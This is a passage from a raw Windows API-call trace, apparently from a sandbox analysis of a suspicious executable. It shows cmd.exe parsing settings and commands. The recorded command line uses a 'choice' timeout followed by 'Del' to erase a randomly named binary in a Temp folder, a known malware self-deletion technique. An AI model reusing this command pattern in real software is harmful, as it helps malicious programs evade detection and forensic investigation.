lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x40, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x40, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.919] RegCloseKey (hKey=0x68) returned 0x0 [0257.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2feb5c | out: phkResult=0x2feb5c*=0x68) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x40, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x1, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x1, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x0, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x9, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x4, lpData=0x2feb68*=0x9, lpcbData=0x2feb60*=0x4) returned 0x0 [0257.919] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2feb64, lpData=0x2feb68, lpcbData=0x2feb60*=0x1000 | out: lpType=0x2feb64*=0x0, lpData=0x2feb68*=0x9, lpcbData=0x2feb60*=0x1000) returned 0x2 [0257.919] RegCloseKey (hKey=0x68) returned 0x0 [0257.919] time (in: timer=0x0 | out: timer=0x0) returned 0x600aec0f [0257.919] srand (_Seed=0x600aec0f) [0257.919] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" \"/C choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" [0257.919] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" \"/C choice /C Y /N /D Y /T 3 & Del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\wqm58yk7.exe" [0257.920] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6e5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.920] GetProcessHeap () returned 0x6e0000 [0257.920] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x210) returned 0x6f2140 [0257.920] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6f2148, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0257.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0257.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.920] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.920] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0257.920] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0257.920] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0257.920] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0257.921] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0257.921] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0257.921] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0257.921] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0257.921] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0257.921] GetProcessHeap () returned 0x6e0000 [0257.921] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f2c18 | out: hHeap=0x6e0000) returned 1 [0257.921] GetEnvironmentStringsW () returned 0x6f2358* [0257.921] GetProcessHeap () returned 0x6e0000 [0257.921] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xae2) returned 0x6f4cb8 [0257.921] FreeEnvironmentStringsW (penv=0x6f2358) returned 1 [0257.921] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0257.921] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0257.921] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0257.921] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0257.921] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0257.921] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0257.921] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0257.921] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0257.921] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0257.921] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0257.921] GetProcessHeap () returned 0x6e0000 [0257.921] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x7c) returned 0x6f57a8 [0257.921] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ff928 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x104, lpBuffer=0x2ff928, lpFilePart=0x2ff924 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x2ff924*="Temp") returned 0x39 [0257.922] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0257.922] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6f1810 [0257.922] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6f1810 [0257.922] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.922] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0257.922] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x6f1810 [0257.923] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x6f1810 [0257.923] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0x6f1810 [0257.923] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFindFileData=0x2ff6a4 | out: lpFindFileData=0x2ff6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x6f1810 [0257.923] FindClose (in: hFindFile=0x6f1810 | out: hFindFile=0x6f1810) returned 1 [0257.924] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0257.924] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 1 [0257.924] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 1 [0257.924] GetProcessHeap () returned 0x6e0000 [0257.924] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f4cb8 | out: hHeap=0x6e0000) returned 1 [0257.924] GetEnvironmentStringsW () returned 0x6f41c8* [0257.924] GetProcessHeap () returned 0x6e0000 [0257.924] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xb5e) returned 0x6f5830 [0257.924] FreeEnvironmentStringsW (penv=0x6f41c8) returned 1 [0257.924] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6e5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0257.924] GetProcessHeap () returned 0x6e0000 [0257.924] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f57a8 | out: hHeap=0x6e0000) returned 1 [0257.924] GetProcessHeap () returned 0x6e0000 [0257.924] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x400e) returned 0x6f6398 [0257.925] GetProcessHeap () returned 0x6e0000 [0257.925] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xda) returned 0x6e0ff0 [0257.925] GetProcessHeap () returned 0x6e0000 [0257.925] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6398 | out: hHeap=0x6e0000) returned 1 [0257.925] GetConsoleOutputCP () returned 0x1b5 [0257.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6e4260 | out: lpCPInfo=0x4a6e4260) returned 1 [0257.925] GetUserDefaultLCID () returned 0x409 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6e4950, cchData=8 | out: lpLCData=":") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ffa68, cchData=128 | out: lpLCData="0") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ffa68, cchData=128 | out: lpLCData="0") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ffa68, cchData=128 | out: lpLCData="1") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6e4940, cchData=8 | out: lpLCData="/") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6e4930, cchData=8 | out: lpLCData=".") returned 2 [0257.926] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6e4920, cchData=8 | out: lpLCData=",") returned 2 [0257.926] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0257.928] GetProcessHeap () returned 0x6e0000 [0257.928] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20c) returned 0x6f2ec0 [0257.928] GetConsoleTitleW (in: lpConsoleTitle=0x6f2ec0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0257.928] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0257.928] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0257.928] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0257.928] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0257.929] GetProcessHeap () returned 0x6e0000 [0257.929] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x400a) returned 0x6f6398 [0257.929] GetProcessHeap () returned 0x6e0000 [0257.929] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x6f6398 | out: hHeap=0x6e0000) returned 1 [0257.930] _wcsicmp (_String1="choice", _String2=")") returned 58 [0257.930] _wcsicmp (_String1="FOR", _String2="choice") returned 3 [0257.930] _wcsicmp (_String1="FOR/?", _String2="choice") returned 3 [0257.930] _wcsicmp (_String1="IF", _String2="choice") returned 6 [0257.930] _wcsicmp (_String1="IF/?", _String2="choice") returned 6 [0257.930] _wcsicmp (_String1="REM", _String2="choice") returned 15 [0257.930] _wcsicmp (_String1="REM/?", _String2="choice") returned 15 [0257.930] GetProcessHeap () returned 0x6e0000 [0257.930] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6e10d8 [0257.930] GetProcessHeap () returned 0x6e0000 [0257.930] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x16) returned 0x6f1848 [0257.930] GetProcessHeap () returned 0x6e0000 [0257.930] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x30) returned 0x6e1138 [0257.931] GetProcessHeap () returned 0x6e0000 [0257.931] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6e1170 [0257.931] _wcsicmp (_String1="Del", _String2=")") returned 59 [0257.931] _wcsicmp (_String1="FOR", _String2="Del") returned 2 [0257.931] _wcsicmp (_String1="FOR/?", _String2="Del") returned 2 [0257.931] _wcsicmp (_String1="IF", _String2="Del") returned 5 [0257.931] _wcsicmp (_String1="IF/?", _String2="Del") returned 5 [0257.932] _wcsicmp (_String1="REM", _String2="Del") returned 14 [0257.932] _wcsicmp (_String1="REM/?", _String2="Del") returned 14 [0257.932] GetProcessHeap () returned 0x6e0000 [0257.932] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x58) returned 0x6e11d0 [0257.932] GetProcessHeap () returned 0x6e0000 [0257.932] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x10) returned 0x6f0000 [0257.934] GetProcessHeap () returned 0x6e0000 [0257.934] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x9a) returned 0x6f30d8 [0257.935] GetConsoleTitleW (in: lpConsoleTitle=0x2ff6fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0257.935] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0257.935] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0257.935] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0257.935] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0257.935] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0257.935] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0257.935] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0257.935] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0257.935] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0257.935] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0257.935] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0257.935] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0257.936] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0257.936] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0257.936] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0257.936] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0257.936] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0257.936] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0257.936] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0257.936] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0257.936] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0257.936] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0257.936] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0257.936] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0257.936] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0257.936] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0257.936] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0257.936] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0257.936] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0257.936] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0257.936] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0257.936] _wcsicmp (_String1="choice", _String2="START") returned -16 [0257.936] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0257.936] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0257.936] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0257.936] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0257.936] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0257.936] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0257.936] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0257.936] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0257.936] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0257.936] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0257.936] _wcsicmp (_String1="choice", _String2="DIR") returned -1 [0257.936] _wcsicmp (_String1="choice", _String2="ERASE") returned -2 [0257.936] _wcsicmp (_String1="choice", _String2="DEL") returned -1 [0257.936] _wcsicmp (_String1="choice", _String2="TYPE") returned -17 [0257.937] _wcsicmp (_String1="choice", _String2="COPY") returned -7 [0257.937] _wcsicmp (_String1="choice", _String2="CD") returned 4 [0257.937] _wcsicmp (_String1="choice", _String2="CHDIR") returned 11 [0257.937] _wcsicmp (_String1="choice", _String2="RENAME") returned -15 [0257.937] _wcsicmp (_String1="choice", _String2="REN") returned -15 [0257.937] _wcsicmp (_String1="choice", _String2="ECHO") returned -2 [0257.937] _wcsicmp (_String1="choice", _String2="SET") returned -16 [0257.937] _wcsicmp (_String1="choice", _String2="PAUSE") returned -13 [0257.937] _wcsicmp (_String1="choice", _String2="DATE") returned -1 [0257.937] _wcsicmp (_String1="choice", _String2="TIME") returned -17 [0257.937] _wcsicmp (_String1="choice", _String2="PROMPT") returned -13 [0257.937] _wcsicmp (_String1="choice", _String2="MD") returned -10 [0257.937] _wcsicmp (_String1="choice", _String2="MKDIR") returned -10 [0257.937] _wcsicmp (_String1="choice", _String2="RD") returned -15 [0257.937] _wcsicmp (_String1="choice", _String2="RMDIR") returned -15 [0257.937] _wcsicmp (_String1="choice", _String2="PATH") returned -13 [0257.937] _wcsicmp (_String1="choice", _String2="GOTO") returned -4 [0257.937] _wcsicmp (_String1="choice", _String2="SHIFT") returned -16 [0257.937] _wcsicmp (_String1="choice", _String2="CLS") returned -4 [0257.937] _wcsicmp (_String1="choice", _String2="CALL") returned 7 [0257.937] _wcsicmp (_String1="choice", _String2="VERIFY") returned -19 [0257.937] _wcsicmp (_String1="choice", _String2="VER") returned -19 [0257.937] _wcsicmp (_String1="choice", _String2="VOL") returned -19 [0257.937] _wcsicmp (_String1="choice", _String2="EXIT") returned -2 [0257.937] _wcsicmp (_String1="choice", _String2="SETLOCAL") returned -16 [0257.937] _wcsicmp (_String1="choice", _String2="ENDLOCAL") returned -2 [0257.937] _wcsicmp (_String1="choice", _String2="TITLE") returned -17 [0257.937] _wcsicmp (_String1="choice", _String2="START") returned -16 [0257.937] _wcsicmp (_String1="choice", _String2="DPATH") returned -1 [0257.937] _wcsicmp (_String1="choice", _String2="KEYS") returned -8 [0257.937] _wcsicmp (_String1="choice", _String2="MOVE") returned -10 [0257.937] _wcsicmp (_String1="choice", _String2="PUSHD") returned -13 [0257.937] _wcsicmp (_String1="choice", _String2="POPD") returned -13 [0257.937] _wcsicmp (_String1="choice", _String2="ASSOC") returned 2 [0257.938] _wcsicmp (_String1="choice", _String2="FTYPE") returned -3 [0257.938] _wcsicmp (_String1="choice", _String2="BREAK") returned 1 [0257.938] _wcsicmp (_String1="choice", _String2="COLOR") returned -7 [0257.938] _wcsicmp (_String1="choice", _String2="MKLINK") returned -10 [0257.938] _wcsicmp (_String1="choice", _String2="FOR") returned -3 [0257.938] _wcsicmp (_String1="choice", _String2="IF") returned -6 [0257.938] _wcsicmp (_String1="choice", _String2="REM") returned -15 [0257.938] GetProcessHeap () returned 0x6e0000 [0257.938] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x210) returned 0x6f3180 [0257.938] GetProcessHeap () returned 0x6e0000 [0257.938] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3e) returned 0x6e1230 [0257.938] _wcsnicmp (_String1="choi", _String2="cmd ", _MaxCount=0x4) returned -5 [0257.938] GetProcessHeap () returned 0x6e0000 [0257.938] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x418) returned 0x6f41c8 [0257.938] SetErrorMode (uMode=0x0) returned 0x0 [0257.938] SetErrorMode (uMode=0x1) returned 0x0 [0257.939] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6f41d0, lpFilePart=0x2ff21c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x2ff21c*="Temp") returned 0x39 [0257.939] SetErrorMode (uMode=0x0) returned 0x1 [0257.939] GetProcessHeap () returned 0x6e0000 [0257.939] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f41c8, Size=0x8a) returned 0x6f41c8 [0257.939] GetProcessHeap () returned 0x6e0000 [0257.939] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f41c8) returned 0x8a [0257.939] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0257.939] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0257.939] GetProcessHeap () returned 0x6e0000 [0257.939] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x148) returned 0x6f3398 [0257.939] GetProcessHeap () returned 0x6e0000 [0257.939] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x288) returned 0x6f4260 [0257.946] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f4260, Size=0x14a) returned 0x6f4260 [0257.946] GetProcessHeap () returned 0x6e0000 [0257.946] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f4260) returned 0x14a [0257.946] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0257.946] GetProcessHeap () returned 0x6e0000 [0257.946] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xe0) returned 0x6f34e8 [0257.946] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x6f34e8, Size=0x76) returned 0x6f34e8 [0257.946] GetProcessHeap () returned 0x6e0000 [0257.946] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x6f34e8) returned 0x76 [0257.947] GetDriveTypeW 